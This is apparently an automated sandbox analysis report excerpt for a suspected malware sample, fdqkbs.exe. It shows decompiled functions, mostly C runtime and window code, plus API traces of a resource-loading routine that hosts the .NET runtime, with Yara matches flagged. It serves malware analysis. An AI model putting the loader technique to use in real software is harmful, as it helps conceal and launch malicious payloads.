					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0x415a64, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0x415f58 - _t7;
								if(__eflags == 0) {
									_t9 = E0040370A(__eflags);
									 *_t9 = E004036C8(GetLastError());
									goto L17;
								} else {
									__eflags = E0040B343(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E0040370A(__eflags);
										 *_t12 = E004036C8(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0040B343(_t6, _t30);
						 *((intOrPtr*)(E0040370A(__eflags))) = 0xc;
						goto L12;
					} else {
						E00408BC0(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0040C4C9(__edx, __edi, __esi, _a8);
				}
			}

0x0040c5e8
0x0040c5f5
0x0040c5f6
0x0040c5f9
0x0040c5fb
0x0040c60a
0x0040c63d
0x0040c63d
0x0040c640
0x00000000
0x00000000
0x0040c60d
0x0040c60f
0x0040c611
0x0040c611
0x0040c611
0x0040c61e
0x0040c624
0x0040c626
0x0040c628
0x0040c688
0x0040c688
0x0040c62a
0x0040c62a
0x0040c630
0x0040c672
0x0040c686
0x00000000
0x0040c632
0x0040c639
0x0040c63b
0x0040c65a
0x0040c66e
0x0040c654
0x0040c654
0x0040c654
0x00000000
0x00000000
0x00000000
0x0040c63b
0x0040c630
0x00000000
0x0040c656
0x0040c643
0x0040c64e
0x00000000
0x0040c5fd
0x0040c600
0x0040c606
0x0040c606
0x0040c657
0x0040c659
0x0040c5ea
0x0040c5f4
0x0040c5f4

APIs

_malloc.LIBCMT ref: 0040C5ED

Part of subcall function 0040C4C9: __FF_MSGBANNER.LIBCMT ref: 0040C4E2
Part of subcall function 0040C4C9: __NMSG_WRITE.LIBCMT ref: 0040C4E9
Part of subcall function 0040C4C9: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00408C0B,00000000,00000001,00000000,?,0040A2E2,00000018,00412270,0000000C,0040A372), ref: 0040C50E

_free.LIBCMT ref: 0040C600

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: fefdf8a66b65aac27a5e3c921786e7e5e3cdc4d72facf406c1a772385b061672
Instruction ID: 6a77f78aa43c2d9d91f7950ce4b899985eb708febcdd106683cded96f858de10
Opcode Fuzzy Hash: fefdf8a66b65aac27a5e3c921786e7e5e3cdc4d72facf406c1a772385b061672
Instruction Fuzzy Hash: F411C432410615EACB313FB1AC456AA3B589B543A1F308B3BF849B72D1DB3E8941969C

Uniqueness

Uniqueness Score: -1.00%

Function 004010B6 Relevance: 7.6, APIs: 5, Instructions: 61
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004010B6() {
				void* _v8;
				void* _v12;
				void* _v524;
				long _t13;
				long _t18;
				int _t19;
				int _t23;

				SendMessageW( *0x415f6c, 0xb0,  &_v12,  &_v8);
				_t19 = _v12;
				if(_t19 == _v8) {
					 *0x4170f0 = _t19;
				}
				if(_t19 >=  *0x4170f0) {
					_t19 = _v8;
				}
				_t23 = SendMessageW( *0x415f6c, 0xc9, _t19, 0);
				_t13 = SendMessageW( *0x415f6c, 0xbb, _t23, 0);
				if( *0x4170f4 != _t23 ||  *0x4170f8 != _t19) {
					_t6 = _t23 + 1; // 0x1
					swprintf( &_v524, 0x231,  *0x415f7c, _t6, _t19 - _t13 + 1);
					_t18 = SendMessageW( *0x415f74, 0x29, 0,  &_v524);
					 *0x4170f4 = _t23;
					 *0x4170f8 = _t19;
					return _t18;
				}
				return _t13;
			}

0x004010db
0x004010dd
0x004010e3
0x004010e5
0x004010e5
0x004010f1
0x004010f3
0x004010f3
0x00401108
0x00401116
0x0040111e
0x0040112e
0x00401144
0x0040115d
0x0040115f
0x00401165
0x00000000
0x00401165
0x0040116f

APIs

SendMessageW.USER32(000000B0,?,?), ref: 004010DB
SendMessageW.USER32(000000C9,?,00000000), ref: 00401104
SendMessageW.USER32(000000BB,00000000,00000000), ref: 00401116
swprintf.LIBCMT ref: 00401144
SendMessageW.USER32(00000029,00000000,?), ref: 0040115D

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: MessageSend$swprintf
String ID:
API String ID: 3793038206-0
Opcode ID: 2fd1dc92b16ec5f4e4f75ff0f9bcaf04bd9515726b0b656210148fd59d724adf
Instruction ID: 66af78921c5875677350cfaec2ba26a2b368e15f8c7f004a64a750f81ebf7e58
Opcode Fuzzy Hash: 2fd1dc92b16ec5f4e4f75ff0f9bcaf04bd9515726b0b656210148fd59d724adf
Instruction Fuzzy Hash: 1F119E76A40309FFDB11DB94EC85FEA7BBCE748700F108177E650A61A1E3B12E458B68

Uniqueness

Uniqueness Score: -1.00%

Function 004089C0 Relevance: 7.5, APIs: 5, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E004089C0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x4121e8);
				E00405990(__ebx, __edi, __esi);
				_t28 = E004072A9(__ebx, __edx, _t31);
				_t12 =  *0x414aa8; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E0040A357(_t20, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E00408973(_t29,  *0x414cf0);
					 *(_t30 - 4) = 0xfffffffe;
					E00408A2D();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E004072A9(_t20, __edx, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					_push(0x20);
					E004069B9(_t25, _t34);
				}
				return E004059D5(_t29);
			}

0x004089c0
0x004089c0
0x004089c0
0x004089c0
0x004089c0
0x004089c2
0x004089c7
0x004089d1
0x004089d3
0x004089db
0x004089ff
0x00408a01
0x00408a07
0x00408a11
0x00408a1c
0x00408a1f
0x00408a26
0x004089dd
0x004089dd
0x004089e1
0x00000000
0x004089e3
0x004089e8
0x004089e8
0x004089e1
0x004089eb
0x004089ed
0x004089ef
0x004089f1
0x004089f6
0x004089fe

APIs

__getptd.LIBCMT ref: 004089CC

Part of subcall function 004072A9: __getptd_noexit.LIBCMT ref: 004072AC
Part of subcall function 004072A9: __amsg_exit.LIBCMT ref: 004072B9

__getptd.LIBCMT ref: 004089E3
__amsg_exit.LIBCMT ref: 004089F1
__lock.LIBCMT ref: 00408A01
__updatetlocinfoEx_nolock.LIBCMT ref: 00408A15

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 0048ee2e9d654e88571322e1a7f2b20f4c6b62c7380a38d321b6e8247d482b4b
Instruction ID: 976e5cdb44841edbfc45673e9f197270e52d64d1e78c74b2d10079b09f234e8e
Opcode Fuzzy Hash: 0048ee2e9d654e88571322e1a7f2b20f4c6b62c7380a38d321b6e8247d482b4b
Instruction Fuzzy Hash: C3F062B2904601ABD625BBAA5906B6E32909F00724F15416FF494B62D3CF7C59409A5F

Uniqueness

Uniqueness Score: -1.00%

Function 004057DE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057DE() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x4182a0;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x4182a0 = _t5;
				}
				_t6 = E00408C3F(_t5, 4);
				 *0x417284 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x4142b0;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x414530) {
							break;
						}
						_t6 =  *0x417284;
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x4142c0;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x417180 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x414320);
					return 0;
				} else {
					 *0x4182a0 = _t26;
					_t6 = E00408C3F(_t26, 4);
					 *0x417284 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}

0x004057de
0x004057e6
0x004057e9
0x004057f4
0x004057f6
0x00000000
0x004057f6
0x004057eb
0x004057eb
0x004057f8
0x004057f8
0x004057f8
0x00405800
0x00405807
0x0040580e
0x0040582e
0x0040582e
0x00405830
0x0040583c
0x0040583c
0x0040583f
0x00405842
0x0040584b
0x00000000
0x00000000
0x00405837
0x00405837
0x0040584f
0x00405850
0x00405852
0x00405858
0x0040586c
0x00405872
0x0040587c
0x0040587c
0x0040587e
0x00405881
0x00405882
0x0040588e
0x00405810
0x00405813
0x00405819
0x00405820
0x00405827
0x00000000
0x00405829
0x0040582b
0x0040582d
0x0040582d
0x00405827

APIs

__calloc_crt.LIBCMT ref: 00405800
__calloc_crt.LIBCMT ref: 00405819

Strings

CA, xrefs: 00405882
0EA, xrefs: 00405845

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: __calloc_crt
String ID: CA$0EA
API String ID: 3494438863-962656358
Opcode ID: e9080e8dac64272fba36a94873b48f66def676edf17581a6cb3ff4e48fb4461a
Instruction ID: 86693eefe5dd9b7c921068e51d74e635daad96af07061ee7db7e118806e0be7c
Opcode Fuzzy Hash: e9080e8dac64272fba36a94873b48f66def676edf17581a6cb3ff4e48fb4461a
Instruction Fuzzy Hash: 7111E772704A155BE7249F1EBD406A73395EB84364B24817FF914E73D0EB3CC8825A4C

Uniqueness

Uniqueness Score: -1.00%

Function 00408D7B Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00408D7B(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E00403753( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00408EAB( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0040370A(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x00408d85
0x00408d8c
0x00408da3
0x00000000
0x00408d93
0x00408d95
0x00408daf
0x00408db4
0x00408db7
0x00408dba
0x00408de2
0x00408de9
0x00408deb
0x00408e6c
0x00408e87
0x00408e89
0x00408dc9
0x00408dc9
0x00408dcc
0x00408dce
0x00408dd1
0x00408dd1
0x00408dd1
0x00408dd1
0x00000000
0x00408dd7
0x00408e4b
0x00408e4b
0x00408e50
0x00408e56
0x00408e59
0x00408e5b
0x00408e5e
0x00408e5e
0x00408e5e
0x00408e5e
0x00000000
0x00408e62
0x00408ded
0x00408df0
0x00408df6
0x00408df9
0x00408e20
0x00408e23
0x00408e29
0x00000000
0x00000000
0x00408e2b
0x00408e2e
0x00000000
0x00000000
0x00408e30
0x00408e30
0x00408e36
0x00408e39
0x00408da8
0x00408da8
0x00408e42
0x00000000
0x00408e42
0x00408dfb
0x00408dfe
0x00000000
0x00000000
0x00408e02
0x00408e13
0x00408e19
0x00408e1b
0x00408e1e
0x00000000
0x00000000
0x00000000
0x00408e1e
0x00408dbc
0x00408dbf
0x00408dc1
0x00408dc6
0x00408dc6
0x00000000
0x00408d97
0x00408d97
0x00408d9c
0x00408da0
0x00408da0
0x00000000
0x00408d9c
0x00408d95

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00408DAF
__isleadbyte_l.LIBCMT ref: 00408DE2
MultiByteToWideChar.KERNEL32(00000080,00000009,004029D6,?,00000000,00000000,?,?,?,?,004029D6), ref: 00408E13
MultiByteToWideChar.KERNEL32(00000080,00000009,004029D6,00000001,00000000,00000000,?,?,?,?,004029D6), ref: 00408E81

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 146e9b4077365b13abf7a7884f3efbec45004c9151c7c70d510fedc203469ba8
Instruction ID: 0c9ba43707c01210f15d82bc915928d229edbab3a984a60048fa1d6b0ab5e1b1
Opcode Fuzzy Hash: 146e9b4077365b13abf7a7884f3efbec45004c9151c7c70d510fedc203469ba8
Instruction Fuzzy Hash: BF31B131A00245EFDB20DFA4CD849AA3BB5EF41310F24867EE4A5AB2D1DB38DD41DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00404E68 Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00404E68(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0040475A(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00404841(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00404D7B(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00404CBA(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x00404e6d
0x00404e73
0x00404ee6
0x00000000
0x00404e7a
0x00404e7a
0x00404e7d
0x00404e98
0x00404e9b
0x00404ebb
0x00404ecd
0x00404e9d
0x00404e9d
0x00404ea0
0x00000000
0x00404ea2
0x00404eb4
0x00404eb4
0x00404ea0
0x00404eeb
0x00404eef
0x00404e7f
0x00404e97
0x00404e97
0x00404e7d

APIs

__cftof_l.LIBCMT ref: 00404E8E

Part of subcall function 00404CBA: __fltout2.LIBCMT ref: 00404CE5

__cftog_l.LIBCMT ref: 00404EB4
__cftoe_l.LIBCMT ref: 00404EE6

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 908501024bb7c2d4d9aded8cda733e96d04f0b6ba79867bc6ebe503863c54618
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 1F11877200014ABBCF165E85CC05CEE3F63BB99354B158926FF1865170D33AD971AB85

Uniqueness

Uniqueness Score: -1.00%

Function 00401F1C Relevance: 6.0, APIs: 4, Instructions: 34
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401F1C(intOrPtr _a4) {
				short _v516;
				short _v1028;

				LoadStringW( *0x415f60, 0x179,  &_v516, 3);
				wsprintfW( &_v1028,  &_v516, _a4);
				LoadStringW( *0x415f60, 0x171,  &_v516, 6);
				return MessageBoxW( *0x415f64,  &_v1028,  &_v516, 0x33);
			}

0x00401f40
0x00401f53
0x00401f70
0x00401f90

APIs

LoadStringW.USER32(00000179,?,00000003), ref: 00401F40
wsprintfW.USER32 ref: 00401F53
LoadStringW.USER32(00000171,?,00000006), ref: 00401F70
MessageBoxW.USER32(?,?,00000033), ref: 00401F88

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: LoadString$Messagewsprintf
String ID:
API String ID: 3675432989-0
Opcode ID: 6152b0956492ec3cf6523048a842ee4a54b8dfacaea3a4816d912d05a09726db
Instruction ID: f1b68f74e27ae39634cdf6190571022c2f1221254ce974dc298a2efd5b2adec8
Opcode Fuzzy Hash: 6152b0956492ec3cf6523048a842ee4a54b8dfacaea3a4816d912d05a09726db
Instruction Fuzzy Hash: 08F01D7690021CBBEB119B50DC89FEA7B7DFB08304F0840B6BB08A60A1D6B15A55CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00402130 Relevance: 6.0, APIs: 4, Instructions: 33
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00402130() {
				struct tagRECT _v20;
				signed int _t7;
				signed int _t14;
				signed int _t20;

				_t20 =  *0x415f78; // 0x0
				_t7 = 0 | _t20 == 0x00000000;
				 *0x415f78 = _t7;
				asm("sbb eax, eax");
				CheckMenuItem(GetMenu( *0x415f64), 0x205,  ~_t7 & 0x00000008);
				GetClientRect( *0x415f64,  &_v20);
				_t14 =  *0x415f78; // 0x0
				asm("sbb eax, eax");
				ShowWindow( *0x415f74,  ~_t14 & 0x00000005);
				E00401170(_v20.right, _v20.bottom);
				return E004010B6();
			}

0x00402138
0x0040213e
0x00402141
0x00402148
0x00402160
0x00402170
0x00402176
0x0040217d
0x00402189
0x00402195
0x004021a0

APIs

GetMenu.USER32(00000205), ref: 00402159
CheckMenuItem.USER32(00000000), ref: 00402160
GetClientRect.USER32 ref: 00402170
ShowWindow.USER32(00000000), ref: 00402189

Part of subcall function 00401170: SendMessageW.USER32(00000005,00000000,00000000), ref: 0040118D
Part of subcall function 00401170: GetWindowRect.USER32 ref: 0040119D
Part of subcall function 00401170: SetWindowPos.USER32(00000000,00000000,00000000,?,?,00000204), ref: 004011C0

Part of subcall function 004010B6: SendMessageW.USER32(000000B0,?,?), ref: 004010DB
Part of subcall function 004010B6: SendMessageW.USER32(000000C9,?,00000000), ref: 00401104
Part of subcall function 004010B6: SendMessageW.USER32(000000BB,00000000,00000000), ref: 00401116
Part of subcall function 004010B6: swprintf.LIBCMT ref: 00401144
Part of subcall function 004010B6: SendMessageW.USER32(00000029,00000000,?), ref: 0040115D

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: MessageSend$Window$MenuRect$CheckClientItemShowswprintf
String ID:
API String ID: 2422921040-0
Opcode ID: 26df89c260fec66ca14058d467dbf074c9a1d408edb5bc0189cbaaa82187ce34
Instruction ID: 2110b4cd67f0e5a39b5caf6ff6ab68c74d55df39b8f184eadb547ce7c05df833
Opcode Fuzzy Hash: 26df89c260fec66ca14058d467dbf074c9a1d408edb5bc0189cbaaa82187ce34
Instruction Fuzzy Hash: 0FF0123159060AFFDB01BFB4ED4ECE93BB9E748305B048531F501D60B0EA7A85969B18

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: fdqkbs.exePID: 5336, Parent PID: 1368COMMON

Execution Graph

Execution Coverage:	11.9%
Dynamic/Decrypted Code Coverage:	73.1%
Signature Coverage:	1.5%
Total number of Nodes:	479
Total number of Limit Nodes:	35

Executed Functions

Function 0040147B Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040148E
FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 00401491
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014A0
LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014A3
LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014B0
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014BC
SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014BF

Part of subcall function 0040147B: CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037

FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014D8
ExitProcess.KERNEL32 ref: 004014E0

Strings

v4.0.30319, xrefs: 00401053

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
String ID: v4.0.30319
API String ID: 2372384083-3152434051
Opcode ID: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
Instruction ID: 1025187115c16df301aa5e6fb14f5cc9936e15f8599d421e9e42fb84dc5f9529
Opcode Fuzzy Hash: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
Instruction Fuzzy Hash: D4F04470A0131477EB202BF34D4DF2B755C9F85746F040874F601BA2A0CAB4DC008679

Uniqueness

Uniqueness Score: -1.00%

Function 00401E16 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00001E22,0040170D), ref: 00401E1B

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
Instruction ID: 1700cd800284021a96fa1165edcf07aa52b884b6f150888f85792e917e9d8571
Opcode Fuzzy Hash: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00400F61 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 303
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037

Strings

v4.0.30319, xrefs: 00401053

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID: v4.0.30319
API String ID: 542301482-3152434051
Opcode ID: 77243af43771274cdb188aef89358dc4b6a46996269f3f5b9eca3cf8be097b49
